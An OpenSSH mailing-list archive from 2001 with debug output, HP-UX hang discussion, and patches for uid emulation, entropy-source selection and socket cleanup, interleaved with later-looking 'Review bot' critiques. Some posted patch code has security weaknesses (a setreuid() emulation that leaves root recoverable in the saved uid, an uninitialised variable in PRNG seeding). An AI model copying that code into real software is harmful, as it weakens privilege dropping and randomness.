ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found hmac-md5 debug1: kex: server->client aes128-cbc hmac-md5 none debug2: mac_init: found hmac-md5 debug1: kex: client->server aes128-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: dh_gen_key: priv key bits set: 124/256 debug1: bits set: 1042/2049 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug3: check_host_in_hostfile: filename /home/abush/.ssh/known_hosts2 debug3: check_host_in_hostfile: match line 8 debug3: check_host_in_hostfile: filename /home/abush/.ssh/known_hosts2 debug3: check_host_in_hostfile: match line 8 debug1: Host 'k200' is known and matches the DSA host key. debug1: Found key in /home/abush/.ssh/known_hosts2:8 debug1: bits set: 1034/2049 debug1: len 55 datafellows 0 debug1: ssh_dss_verify: signature correct debug1: kex_derive_keys debug1: newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: done: ssh_kex2. 
debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,password,keyboard-interactive debug3: start over, passed a different list publickey,password,keyboard-interactive debug3: preferred publickey,password,keyboard-interactive debug3: authmethod_lookup publickey debug3: remaining preferred: password,keyboard-interactive debug3: authmethod_is_enabled publickey debug1: next auth method to try is publickey debug1: userauth_pubkey_agent: testing agent key /home/abush/.ssh/id_dsa debug3: send_pubkey_test debug2: we sent a publickey packet, wait for reply debug1: input_userauth_pk_ok: pkalg ssh-dss blen 433 lastkey 0x808f678 hint -1 debug2: input_userauth_pk_ok: fp 2f:3d:aa:c6:e8:6e:68:f5:d4:7e:8a:7f:3c:af:3e:4d debug3: sign_and_send_pubkey debug3: clear_auth_state: key_free 0x808f678 debug1: ssh-userauth2 successful: method publickey debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: fd 5 setting O_NONBLOCK debug1: fd 6 IS O_NONBLOCK debug1: channel 0: new [client-session] debug1: channel_new: 0 debug1: send channel open 0 debug1: Entering interactive session. 
debug2: callback start debug1: client_init id 0 arg 0 debug2: tty_make_modes: ospeed 38400 debug2: tty_make_modes: ispeed 38400 debug2: tty_make_modes: 1 3 debug2: tty_make_modes: 2 28 debug2: tty_make_modes: 3 127 debug2: tty_make_modes: 4 21 debug2: tty_make_modes: 5 4 debug2: tty_make_modes: 6 255 debug2: tty_make_modes: 7 255 debug2: tty_make_modes: 8 17 debug2: tty_make_modes: 9 19 debug2: tty_make_modes: 10 26 debug2: tty_make_modes: 12 18 debug2: tty_make_modes: 13 23 debug2: tty_make_modes: 14 22 debug2: tty_make_modes: 18 15 debug2: tty_make_modes: 30 0 debug2: tty_make_modes: 31 0 debug2: tty_make_modes: 32 0 debug2: tty_make_modes: 33 0 debug2: tty_make_modes: 34 0 debug2: tty_make_modes: 35 0 debug2: tty_make_modes: 36 1 debug2: tty_make_modes: 37 0 debug2: tty_make_modes: 38 1 debug2: tty_make_modes: 39 1 debug2: tty_make_modes: 40 0 debug2: tty_make_modes: 41 1 debug2: tty_make_modes: 50 1 debug2: tty_make_modes: 51 1 debug2: tty_make_modes: 52 0 debug2: tty_make_modes: 53 1 debug2: tty_make_modes: 54 1 debug2: tty_make_modes: 55 1 debug2: tty_make_modes: 56 0 debug2: tty_make_modes: 57 0 debug2: tty_make_modes: 58 0 debug2: tty_make_modes: 59 1 debug2: tty_make_modes: 60 1 debug2: tty_make_modes: 61 1 debug2: tty_make_modes: 62 0 debug2: tty_make_modes: 70 1 debug2: tty_make_modes: 71 0 debug2: tty_make_modes: 72 1 debug2: tty_make_modes: 73 0 debug2: tty_make_modes: 74 0 debug2: tty_make_modes: 75 0 debug2: tty_make_modes: 90 1 debug2: tty_make_modes: 91 1 debug2: tty_make_modes: 92 0 debug2: tty_make_modes: 93 0 debug1: channel request 0: shell debug2: callback done debug1: channel 0: open confirm rwindow 0 rmax 16384 debug2: channel 0: rcvd adjust 32768 Last login: Thu Jun 7 10:22:33 2001 from sysadm.microcen TERM = (xterm) HHHHHHHHH H H H H H H H H H[?1l>k200$ exit logout debug1: channel 0: rcvd eof debug1: channel 0: output open -> drain debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: close_write 
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: channel 0: rcvd close debug1: channel 0: input open -> closed debug1: channel 0: close_read debug2: channel 0: no data after CLOSE debug1: channel 0: send close debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1) debug1: channel_free: channel 0: dettaching channel user Connection to k200 closed. debug1: Transferred: stdin 0, stdout 0, stderr 28 bytes in 7.1 seconds debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 4.0 debug1: Exit status 0 From Lutz.Jaenicke at aet.TU-Cottbus.DE Fri Jun 8 01:36:16 2001 
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 7 Jun 2001 17:36:16 +0200 Subject: HPUX: ssh hangs after shell exit In-Reply-To: <3B1F885C.92328A94@mail.microcenter.com>; from abush@microcenter.com on Thu, Jun 07, 2001 at 09:57:48AM -0400 References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607061206.I14017@postal.il.thewrittenword.com> <3B1F885C.92328A94@mail.microcenter.com> Message-ID: <20010607173616.A13083@ws01.aet.tu-cottbus.de> On Thu, Jun 07, 2001 at 09:57:48AM -0400, Aaron Bush wrote: > openssh-unix-dev at thewrittenword.com wrote: > > > > On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > > > The problem i am having appears to be similar to what others have > > > reported where after typing exit in an interactive shell the connection > > > is not closed until an additional _one_ key stroke is issued (space-bar, > > > enter, etc...). > > > > > > The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting > > > using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and > > > FreeBSD-4.2. The behavior so far is _always_ consistent: > > > > We have *no* problems with 2.9p1 on HP-UX 11.00 here. We do use the HP > > commercial C compiler to build it. > > > > -- > > albert chin (china at thewrittenword.com) > > I am using gcc 2.95.2 and the problem does exist. > I have not tried the HP ANSI C compiler though. I am using HP's compiler on 10.20 and the problem is there but not reproducible. Sometimes it happens, sometimes it does not. With respect to HP's documentation, on 10.20 the manual page for sigaction states: SA_RESTART This flag affects the behaviour of interruptible functions; that is, those specified to fail with errno set to EINTR. If set, and a function specified as interruptible is interrupted by this signal, the function will restart and will not fail with EINTR unless otherwise specified. 
If the flag is not set, interruptible functions interrupted by this signal will fail with errno set to EINTR. The select() manual page states: [EINTR] The select() function was interrupted before any of the selected events occurred and before the timeout interval expired. If SA_RESTART has been set for the interrupting signal, it is implementation-dependent whether select() restarts or returns with EINTR. Therefore we cannot rely on select() being interrupted when SA_RESTART is set. It is implementation dependent, whatever this means on a specific version of HP-UX. But the authors of the documentation specifically wanted to point out that we should not rely on a specific behaviour. Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From J.S.Peatfield at damtp.cam.ac.uk Fri Jun 8 01:58:26 2001 From: J.S.Peatfield at damtp.cam.ac.uk (Jon Peatfield) Date: Thu, 07 Jun 2001 16:58:26 +0100 Subject: Patch for systems with no setreuid() Message-ID: <200106071558.QAA01642.redmires.amtp.cam.ac.uk@damtp.cam.ac.uk> Sorry if I'm duplicating an existing patch, but... On systems with no seteuid() that have setreuid() there is an emulation, but if both are lacking (but we do have setresuid()), nothing is done. The following seems to be right, but I've only got one machine (running an ancient version of HP-UX) which needs this so it may not be general: --cut-here-- --- config.h.in.orig Thu Jun 7 14:18:57 2001 +++ config.h.in Thu Jun 7 14:19:33 2001 @@ -503,6 +503,9 @@ /* Define if you have the setreuid function. */ #undef HAVE_SETREUID +/* Define if you have the setresuid function. */ +#undef HAVE_SETRESUID + /* Define if you have the setrlimit function. */ #undef HAVE_SETRLIMIT --- configure.orig Thu Jun 7 14:12:53 2001 +++ configure Thu Jun 7 14:13:40 2001 
@@ -3184,7 +3184,7 @@ fi -for ac_func in arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop +for ac_func in arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setresuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop do echo $ac_n "checking for $ac_func""... $ac_c" 1>&6 echo "configure:3191: checking for $ac_func" >&5 --- configure.in.orig Thu Jun 7 14:12:44 2001 +++ configure.in Thu Jun 7 14:13:10 2001 
@@ -447,7 +447,7 @@ ) dnl Checks for library functions. -AC_CHECK_FUNCS(arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop) +AC_CHECK_FUNCS(arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setresuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop) dnl Checks for time functions AC_CHECK_FUNCS(gettimeofday time) dnl Checks for libutil functions --- openbsd-compat/bsd-misc.c.orig Thu Jun 7 14:07:58 2001 +++ openbsd-compat/bsd-misc.c Thu Jun 7 14:26:12 2001 
@@ -70,6 +70,20 @@ } #endif /* !defined(HAVE_SETEUID) && defined(HAVE_SETREUID) */ +#if !defined(HAVE_SETEUID) && defined(HAVE_SETRESUID) +int seteuid(uid_t euid) +{ + return(setresuid(-1,euid,-1)); +} +#endif /* !defined(HAVE_SETEUID) && defined(HAVE_SETRESUID) */ + +#if !defined(HAVE_SETREUID) && defined(HAVE_SETRESUID) +int setreuid(uid_t ruid, uid_t euid) +{ + return(setresuid(ruid,euid,-1)); +} +#endif /* !defined(HAVE_SETREUID) && defined(HAVE_SETRESUID) */ + #if !defined(HAVE_SETEGID) && defined(HAVE_SETRESGID) int setegid(uid_t egid) { --cut-here-- Of course on this particular platform I need other patches (to turn off HP-UX specific stuff which are missing (hpsecurity etc)), but the above might be useful elsewhere... -- Jon Peatfield, DAMTP, Computer Officer, University of Cambridge Telephone: +44 1223 3 37852 Mail: J.S.Peatfield at damtp.cam.ac.uk From dwd at bell-labs.com Fri Jun 8 03:29:57 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Thu, 7 Jun 2001 12:29:57 -0500 Subject: non-ansi function in openbsd-compat Message-ID: <20010607122957.A15107@lucent.com> I ran across one file in the openbsd-compat directory, strmode.c, that was not using an ANSI C function declaration. One compiler (HPUX's cc -Ae) wouldn't let it pass. Here's a patch. - Dave Dykstra *** openbsd-compat/strmode.c.O Wed Jun 6 17:32:44 2001 --- openbsd-compat/strmode.c Wed Jun 6 17:32:59 2001 *************** *** 43,51 **** #include void ! strmode(mode, p) ! register mode_t mode; ! register char *p; { /* print type */ switch (mode & S_IFMT) { --- 43,49 ---- #include void ! strmode(register mode_t mode, register char *p) { /* print type */ switch (mode & S_IFMT) { From dwd at bell-labs.com Fri Jun 8 03:50:14 2001 
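Review bot: in the openbsd-compat/bsd-misc.c hunk, the setreuid() emulation `return(setresuid(ruid,euid,-1));` does not have setreuid() semantics for the saved set-user-ID: real setreuid() also sets the saved uid to the new effective uid whenever the real uid changes or the effective uid is set to something other than the real uid, whereas this emulation always leaves the saved uid alone, so a caller that uses setreuid() to drop root permanently would keep root recoverable in the saved uid on such a system. Either pass `euid` as the third argument in those cases, or document in a comment that callers needing a permanent drop must use setresuid() directly. A comment on the `-1` convention would also help, since uid_t is unsigned on most platforms and the literal only works because the kernel compares it to (uid_t)-1.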
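Review bot: in the strmode.c hunk, the new prototype `strmode(register mode_t mode, register char *p)` keeps the `register` storage class, which is legal in a prototype but serves no purpose on any compiler that accepts ANSI C; write it as `void strmode(mode_t mode, char *p)` and check that the declaration in the header which exports strmode() matches the new prototype exactly, since a K&R definition used to tolerate mismatches that an ANSI prototype will now diagnose.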
From: dwd at bell-labs.com (Dave Dykstra) Date: Thu, 7 Jun 2001 12:50:14 -0500 Subject: Patch to enable multiple possible sources of entropy Message-ID: <20010607125014.A15157@lucent.com> I have a need to have the same OpenSSH binaries run on multiple machines which are administered by different people. That means on Solaris, for example, there will be some with /dev/random, some on which I can run prngd because they'll be installing my binaries as root, and some which will have neither because they will be only installed as non-root. Below is a patch to enable choosing all 3 possible sources at compile time, with the available source selected at run time. If no configure parameters are given, it will still determine the entropy source at compile time and only the code for the one type, exactly as it does today. The patch adds a configure option called --with-builtin-entropy. I have tested this in all possible combinations of entropy sources, and on 6 different flavors of Unix (linux, solaris, sunos4, hpux, irix, and unixware1). The patch is against 2.9p1 but applies cleanly to the current CVS. Please accept this patch into the openssh code base. Don't forget to run autoheader and autoconf. - Dave Dykstra *** entropy.c.O Fri Jun 1 15:52:20 2001 --- entropy.c Tue Jun 5 17:41:47 2001 *************** *** 80,91 **** # define USE_PRNGD #endif - #if defined(USE_PRNGD) || defined(RANDOM_POOL) - #ifdef USE_PRNGD /* Collect entropy from PRNGD/EGD */ int ! get_random_bytes(unsigned char *buf, int len) { int fd; char msg[2]; --- 80,89 ---- # define USE_PRNGD #endif #ifdef USE_PRNGD /* Collect entropy from PRNGD/EGD */ int ! 
prngd_get_random_bytes(unsigned char *buf, int len) { int fd; char msg[2]; *************** *** 100,110 **** --- 98,110 ---- memset(&addr, '\0', sizeof(addr)); #ifdef PRNGD_PORT + debug2("Opening entropy socket on localhost port %d", PRNGD_PORT); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); addr.sin_port = htons(PRNGD_PORT); addr_len = sizeof(struct sockaddr_in); #else /* use IP socket PRNGD_SOCKET instead */ + debug2("Opening entropy socket at %s", PRNGD_SOCKET); /* Sanity checks */ if (sizeof(PRNGD_SOCKET) > sizeof(addr.sun_path)) fatal("Random pool path is too long"); *************** *** 179,192 **** close(fd); return(rval); } ! #else /* !USE_PRNGD */ #ifdef RANDOM_POOL /* Collect entropy from /dev/urandom or pipe */ int ! get_random_bytes(unsigned char *buf, int len) { int random_pool; random_pool = open(RANDOM_POOL, O_RDONLY); if (random_pool == -1) { error("Couldn't open random pool \"%s\": %s", --- 179,194 ---- close(fd); return(rval); } ! #endif /* !USE_PRNGD */ ! #ifdef RANDOM_POOL /* Collect entropy from /dev/urandom or pipe */ int ! 
pool_get_random_bytes(unsigned char *buf, int len) { int random_pool; + debug2("Opening random pool at %s", RANDOM_POOL); random_pool = open(RANDOM_POOL, O_RDONLY); if (random_pool == -1) { error("Couldn't open random pool \"%s\": %s", *************** *** 206,242 **** return(1); } #endif /* RANDOM_POOL */ - #endif /* USE_PRNGD */ - - /* - * Seed OpenSSL's random number pool from Kernel random number generator - * or PRNGD/EGD - */ - void - seed_rng(void) - { - unsigned char buf[32]; - - debug("Seeding random number generator"); - - if (!get_random_bytes(buf, sizeof(buf))) { - if (!RAND_status()) - fatal("Entropy collection failed and entropy exhausted"); - } else { - RAND_add(buf, sizeof(buf), sizeof(buf)); - } - - memset(buf, '\0', sizeof(buf)); - } - - void - init_rng(void) - { - check_openssl_version(); - } - - #else /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ /* * FIXME: proper entropy estimations. All current values are guesses * FIXME: (ATL) do estimates at compile time? --- 208,215 ---- return(1); } #endif /* RANDOM_POOL */ + #ifdef USE_BUILTIN_ENTROPY /* * FIXME: proper entropy estimations. All current values are guesses * FIXME: (ATL) do estimates at compile time? *************** *** 834,840 **** * syscalls and program output */ void ! seed_rng(void) { mysig_t old_sigchld_handler; --- 807,813 ---- * syscalls and program output */ void ! prng_seed_rng(void) { mysig_t old_sigchld_handler; *************** *** 860,871 **** } void ! init_rng(void) { int original_euid; - check_openssl_version(); - original_uid = getuid(); original_euid = geteuid(); --- 833,842 ---- } void ! prng_init_rng(void) { int original_euid; original_uid = getuid(); original_euid = geteuid(); *************** *** 912,915 **** prng_initialised = 1; } ! #endif /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ --- 883,979 ---- prng_initialised = 1; } ! #endif /* USE_BUILTIN_ENTROPY */ ! ! #define BUILTIN_SOURCE 1 ! #define PRNGD_SOURCE 2 ! #define POOL_SOURCE 3 ! ! 
static int seed_source = 0; ! ! void ! init_rng(void) ! { ! check_openssl_version(); ! ! #ifdef RANDOM_POOL ! #if !defined(USE_PRNGD) && !defined(USE_BUILTIN_ENTROPY) ! seed_source = POOL_SOURCE; ! #else ! if (access(RANDOM_POOL, R_OK) == 0) { ! seed_source = POOL_SOURCE; ! return; ! } ! #endif ! #endif /* RANDOM_POOL */ ! ! /* it's not trivial to probe for an open port so just make it ! * take priority over the other sources if it is defined ! */ ! #ifdef PRNGD_PORT ! seed_source = PRNGD_SOURCE; ! #else ! ! #ifdef PRNGD_SOCKET ! #ifndef USE_BUILTIN_ENTROPY ! seed_source = PRNGD_SOURCE; ! #else ! if (access(PRNGD_SOCKET, R_OK) == 0) { ! seed_source = PRNGD_SOURCE; ! return; ! } ! #endif /* USE_BUILTIN_ENTROPY */ ! #endif /* PRNGD_SOCKET */ ! ! #ifdef USE_BUILTIN_ENTROPY ! seed_source = BUILTIN_SOURCE; ! prng_init_rng(); ! #endif ! ! #endif /* PRNGD_PORT */ ! ! if (seed_source == 0) ! fatal("Couldn't find source for random number generator seed"); ! } ! ! /* ! * Seed OpenSSL's random number pool ! */ ! void ! seed_rng(void) ! { ! unsigned char buf[32]; ! int ret; ! ! debug("Seeding random number generator"); ! ! switch (seed_source) { ! #ifdef USE_BUILTIN_ENTROPY ! case BUILTIN_SOURCE: ! prng_seed_rng(); ! return; ! #endif ! #ifdef USE_PRNGD ! case PRNGD_SOURCE: ! ret = prngd_get_random_bytes(buf, sizeof(buf)); ! break; ! #endif ! #ifdef RANDOM_POOL ! case POOL_SOURCE: ! ret = pool_get_random_bytes(buf, sizeof(buf)); ! break; ! #endif ! } ! ! #if defined(USE_PRNGD) || defined(RANDOM_POOL) ! if (!ret) { ! if (!RAND_status()) ! fatal("Entropy collection failed and entropy exhausted"); ! } else { ! RAND_add(buf, sizeof(buf), sizeof(buf)); ! } ! ! memset(buf, '\0', sizeof(buf)); ! #endif ! } ! *** configure.in.O Mon Jun 4 12:25:12 2001 --- configure.in Thu Jun 7 13:37:09 2001 *************** *** 1334,1340 **** ] ) ! # Check for PRNGD/EGD pool file AC_ARG_WITH(prngd-port, [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], [ --- 1334,1340 ---- ] ) ! 
# Check for PRNGD/EGD pool port request AC_ARG_WITH(prngd-port, [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], [ *************** *** 1349,1354 **** --- 1349,1357 ---- AC_ARG_WITH(prngd-socket, [ --with-prngd-socket=FILE read entropy from PRNGD/EGD socket FILE (default=/var/run/egd-pool)], [ + if test ! -z "$PRNGD_PORT" ; then + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-prngd-socket]) + fi if test "x$withval" != "xno" ; then PRNGD_SOCKET="$withval" AC_DEFINE_UNQUOTED(PRNGD_SOCKET, "$PRNGD_SOCKET") *************** *** 1375,1385 **** ] ) # detect pathnames for entropy gathering commands, if we need them INSTALL_SSH_PRNG_CMDS="" rm -f prng_commands ! if (test -z "$RANDOM_POOL" && test -z "$PRNGD") ; then # Use these commands to collect entropy OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) --- 1378,1406 ---- ] ) + # Check for use of builtin entropy collector + AC_ARG_WITH(builtin-entropy, + [ --with-builtin-entropy use builtin entropy collector if nothing else available], + [ + if test ! -z "$PRNGD_PORT" ; then + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-builtin-entropy]) + fi + BUILTIN_RNG=1 + ], + [ + # Only select by default if don't have another method + if test -z "$RANDOM_POOL" && test -z "$PRNGD" ; then + BUILTIN_RNG=1 + fi + ] + ) # detect pathnames for entropy gathering commands, if we need them INSTALL_SSH_PRNG_CMDS="" rm -f prng_commands ! if test ! -z "$BUILTIN_RNG" ; then ! AC_DEFINE(USE_BUILTIN_ENTROPY) ! # Use these commands to collect entropy OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) *************** *** 1885,1901 **** # Print summary of options ! if test ! -z "$RANDOM_POOL" ; then ! RAND_MSG="Device ($RANDOM_POOL)" ! else ! if test ! -z "$PRNGD_PORT" ; then ! RAND_MSG="PRNGD/EGD (port localhost:$PRNGD_PORT)" ! elif test ! -z "$PRNGD_SOCKET" ; then ! RAND_MSG="PRNGD/EGD (socket $PRNGD_SOCKET)" else ! 
RAND_MSG="Builtin (timeout $entropy_timeout)" ! BUILTIN_RNG=1 fi fi # Someone please show me a better way :) --- 1906,1930 ---- # Print summary of options ! RAND_MSG="" ! randmsg() ! { ! if test -z "$RAND_MSG" ; then ! RAND_MSG="$1" else ! RAND_MSG="$RAND_MSG or $1" fi + } + if test ! -z "$RANDOM_POOL" ; then + randmsg "Device ($RANDOM_POOL)" + fi + if test ! -z "$PRNGD_PORT" ; then + randmsg "PRNGD/EGD (port localhost:$PRNGD_PORT)" + elif test ! -z "$PRNGD_SOCKET" ; then + randmsg "PRNGD/EGD (socket $PRNGD_SOCKET)" + fi + if test ! -z "$BUILTIN_RNG" ; then + randmsg "Builtin (timeout $entropy_timeout)" fi # Someone please show me a better way :) *** acconfig.h.O Mon Jun 4 12:42:09 2001 --- acconfig.h Mon Jun 4 13:53:36 2001 *************** *** 95,100 **** --- 95,103 ---- /* Port number of PRNGD/EGD random number socket */ #undef PRNGD_PORT + /* Use builtin entropy collector if nothing else available */ + #undef USE_BUILTIN_ENTROPY + /* Builtin PRNG command timeout */ #undef ENTROPY_TIMEOUT_MSEC From stevesk at pobox.com Fri Jun 8 04:42:27 2001 
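Review bot: in the init_rng() hunk both runtime probes, access(RANDOM_POOL, R_OK) and access(PRNGD_SOCKET, R_OK), test readability when all the code needs to know is whether the path exists; the follow-up later in this thread reports that on UnixWare 1 the Unix-domain socket is a mode 000 named pipe, so R_OK fails and the PRNGD source is never selected. Use F_OK in both places so the probe asks only the question it can answer, and fall through to the next source when it fails.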
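Review bot: in the seed_rng() hunk `int ret;` is never initialised and the switch has no default, so if seed_source matches none of the compiled-in cases the `if (!ret)` test reads an indeterminate value; when it happens to be non-zero, RAND_add(buf, sizeof(buf), sizeof(buf)) credits 32 bytes of entropy from an uninitialised buffer. Initialise `ret = 0` and add `default: fatal("seed_rng: unknown seed source");` so an unexpected source is a hard failure rather than a silently unseeded PRNG.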
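Review bot: the --with-builtin-entropy hunk rejects the combination with --with-prngd-port but deliberately allows --with-prngd-socket, and the --with-prngd-socket hunk likewise rejects only --with-prngd-port; the reason is only stated in entropy.c ("it's not trivial to probe for an open port", whereas a socket path can be probed with access()). Put that one-line justification next to each AC_MSG_ERROR in configure.in, otherwise the asymmetry reads as an oversight and the next person will "fix" it by rejecting the socket case too.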
From: stevesk at pobox.com (Kevin Steves)
Date: Thu, 7 Jun 2001 11:42:27 -0700 (PDT)
Subject: Defect: OpenSSH hangs on logout
In-Reply-To: <20010607092831.D24958@eeg.ccf.org>
Message-ID:

On Thu, 7 Jun 2001, Greg Wooledge wrote:
:> does 10.20 hang with 2.9 without the patch? with the patch?
:
:It hangs both with and without the patch. Every time. (It certainly
:doesn't act like a race condition, as someone else mentioned.)
:
:Just to refresh memories, this is the symptom:
:
: box1$ ssh somewhere
: somewhere$ sleep 500 &
: somewhere$ logout
: (hangs)
:
:Then, if I kill the sleep process in another window, the connection is
:immediately terminated and everything is back to normal.

this is a different problem. it is easy to produce for me on hp-ux 11.11
with protocol 2. i ssh to the hp-ux host, followed by an exit, i see:

bash-2.05$ exit
logout
logout
logout

and hang. on the server:

stevesk 1611 1609 9 11:33:29 ? 0:00
root 1609 912 0 11:33:28 ? 0:00 sshd: stevesk at 1

the server was blocked in select() when the SIGCHLD was received, and it
was restarted, where it is blocked waiting for input. if you enter one
character it will return and process the sigchld handler flag.

the patch i posted does not set SA_RESTART for SIGCHLD. some systems may
restart select() in this case, and we don't want that behaviour.

From markus.friedl at informatik.uni-erlangen.de Fri Jun 8 06:52:33 2001

From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 22:52:33 +0200 Subject: OpenSSH tmp cleanup In-Reply-To: <20010605165404.A13522@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Tue, Jun 05, 2001 at 04:54:04PM +0200 References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> Message-ID: <20010607225233.A21260@folly> did someone check this? -m On Tue, Jun 05, 2001 at 04:54:04PM +0200, Markus Friedl wrote: > On Tue, Jun 05, 2001 at 09:21:46AM +0300, Jarno Huuskonen wrote: > > I noticed that Markus has fixed the temporary file cleanup problems in > > OpenSSH cvs. What files need patching for this ? I only noticed > > changes in: session.c, channels.h and channels.c. > > yes. > > i tried to port this back to 2.9, but i don't have time for > testing etc. > > simple fix is > s/cookies/x11_forwarding_with_openssh_is_fun/ > in session.c > > correct fix looks like: > > Index: channels.c > =================================================================== > RCS file: /home/markus/cvs/ssh/channels.c,v > retrieving revision 1.109 > diff -u -r1.109 channels.c > --- channels.c 2001/04/17 12:55:03 1.109 > +++ channels.c 2001/06/05 14:38:42 > @@ -2524,10 +2524,17 @@ > /* removes the agent forwarding socket */ > > void > -cleanup_socket(void) > +auth_sock_cleanup_proc(void *_pw) > { > - unlink(channel_forwarded_auth_socket_name); > - rmdir(channel_forwarded_auth_socket_dir); > + struct passwd *pw = _pw; > + > + if (channel_forwarded_auth_socket_name) { > + temporarily_use_uid(pw); > + unlink(channel_forwarded_auth_socket_name); > + rmdir(channel_forwarded_auth_socket_dir); > + channel_forwarded_auth_socket_name = NULL; > + restore_uid(); > + } > } > > /* 
